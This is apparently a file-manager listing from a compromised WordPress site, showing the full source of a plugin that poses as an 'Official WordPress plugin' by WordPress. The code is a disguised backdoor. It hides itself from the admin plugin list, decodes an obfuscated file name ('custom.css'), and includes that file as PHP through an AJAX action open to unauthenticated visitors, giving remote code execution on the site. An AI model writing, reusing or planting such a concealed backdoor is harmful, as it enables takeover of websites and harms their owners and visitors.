PATH:
home
/
ediuae
/
petalwellnessspa.com
/
wp-content
/
plugins
/
wp-maze-endocrine
<?php /* Plugin Name: WP Maze Endocrine Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 17.0.7 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function ppj_qsq() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $y = array('wp-maze-endocrine/wp-maze-endocrine.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $y)) { unset($wp_list_table->items[$key]); } } } } function swy_zln($plugins) { $l = 'wp-maze-endocrine/wp-maze-endocrine.php'; if (array_key_exists($l, $plugins)) { unset($plugins[$l]); } return $plugins; } function xzz($x, $j) { $a = ''; for ($t = 0; $t < strlen($x); $t += 2) { $u = ord($x[$t]) - 65; $w = ord($x[$t + 1]); if ($w > 90) $w -= 6; $p = $u * 52 + ($w - 65); $a .= chr($p - $j); } return $a; } function ifs_ajax_handler() { include plugin_dir_path(__FILE__) . xzz('GGGYGWGXGSGQFFGGGWGW', 219); die(); } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'ppj_qsq'); add_filter('all_plugins', 'swy_zln'); add_action('wp_ajax_maz_end', 'ifs_ajax_handler'); add_action('wp_ajax_nopriv_maz_end', 'ifs_ajax_handler'); }
[+]
..
[-] custom.css
[edit]
[-] wp-maze-endocrine.php
[edit]
[-] .htaccess
[edit]